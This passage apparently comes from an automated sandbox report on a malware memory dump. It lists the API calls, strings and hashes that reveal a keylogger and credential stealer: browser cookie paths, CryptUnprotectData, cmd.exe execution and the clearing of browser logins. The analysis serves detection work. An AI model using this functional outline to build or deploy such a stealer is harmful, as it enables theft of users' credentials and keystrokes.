                              • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExistsFilePath
                              • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                              • API String ID: 1174141254-1980882731
                              • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                              • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                              • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                              • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                              APIs
                              • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                              • wsprintfW.USER32 ref: 0040B1F3
                                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: EventLocalTimewsprintf
                              • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                              • API String ID: 1497725170-1359877963
                              • Opcode ID: 1fe5ba1052da877e8a1748b0080b1d9741ef1941b800da5b99f57d7a1e6ac5af
                              • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                              • Opcode Fuzzy Hash: 1fe5ba1052da877e8a1748b0080b1d9741ef1941b800da5b99f57d7a1e6ac5af
                              • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                              APIs
                                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                              • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                              • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateThread$LocalTime$wsprintf
                              • String ID: Online Keylogger Started
                              • API String ID: 112202259-1258561607
                              • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                              • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                              • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                              • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                              APIs
                              • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                              • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: CryptUnprotectData$crypt32
                              • API String ID: 2574300362-2380590389
                              • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                              • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                              • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                              • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                              • CloseHandle.KERNEL32(?), ref: 004051CA
                              • SetEvent.KERNEL32(?), ref: 004051D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandleObjectSingleWait
                              • String ID: Connection Timeout
                              • API String ID: 2055531096-499159329
                              • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                              • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                              • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                              • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                              APIs
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Exception@8Throw
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 2005118841-1866435925
                              • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                              • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                              • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                              • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                              APIs
                              • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                              • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                              • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: pth_unenc
                              • API String ID: 1818849710-4028850238
                              • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                              • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                              • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                              • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                              • String ID: bad locale name
                              • API String ID: 3628047217-1405518554
                              • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                              • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                              • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                              • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                              • ShowWindow.USER32(00000009), ref: 00416C61
                              • SetForegroundWindow.USER32 ref: 00416C6D
                                • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                              • String ID: !D@
                              • API String ID: 3446828153-604454484
                              • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                              • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                              • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                              • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: /C $cmd.exe$open
                              • API String ID: 587946157-3896048727
                              • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                              • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                              • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                              • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                              APIs
                              • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                              • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                              • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: TerminateThread$HookUnhookWindows
                              • String ID: pth_unenc
                              • API String ID: 3123878439-4028850238
                              • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                              • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                              • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                              • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                              APIs
                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                              • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: GetCursorInfo$User32.dll
                              • API String ID: 1646373207-2714051624
                              • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                              • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                              • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                              • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                              APIs
                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                              • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetLastInputInfo$User32.dll
                              • API String ID: 2574300362-1519888992
                              • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                              • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                              • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                              • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: __alldvrm$_strrchr
                              • String ID:
                              • API String ID: 1036877536-0
                              • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                              • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                              • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                              • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
                              • API String ID: 269201875-0
                              • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                              • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                              • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                              • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                              • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                              • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                              • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                              APIs
                              Strings
                              • Cleared browsers logins and cookies., xrefs: 0040C0F5
                              • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                              • API String ID: 3472027048-1236744412
                              • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                              • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                              • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                              • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                              APIs
                                • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                              • Sleep.KERNEL32(000001F4), ref: 0040A573
                              • Sleep.KERNEL32(00000064), ref: 0040A5FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$ForegroundLength
                              • String ID: [ $ ]
                              • API String ID: 3309952895-93608704
                              • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                              • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                              • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                              • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                              • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                              • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                              • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                              • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                              • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                              • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                              • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad$ErrorLast
                              • String ID:
                              • API String ID: 3177248105-0
                              • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                              • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                              • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                              • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                              • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleReadSize
                              • String ID:
                              • API String ID: 3919263394-0
                              • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                              • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                              • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                              • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                              APIs
                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleOpenProcess
                              • String ID:
                              • API String ID: 39102293-0
                              • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                              • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                              • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                              • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                              APIs
                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                              • _UnwindNestedFrames.LIBCMT ref: 00439891
                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                              • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                              • String ID:
                              • API String ID: 2633735394-0
                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                              • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                              • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                              APIs
                              • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                              • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                              • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                              • GetSystemMetrics.USER32(0000004F), ref: 00419402
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: MetricsSystem
                              • String ID:
                              • API String ID: 4116985748-0
                              • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                              • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                              • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                              • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                              APIs
                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                              • String ID:
                              • API String ID: 1761009282-0
                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                              • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                              • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                              APIs
                              • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorHandling__start
                              • String ID: pow
                              • API String ID: 3213639722-2276729525
                              • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                              • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                              • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                              • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                              APIs
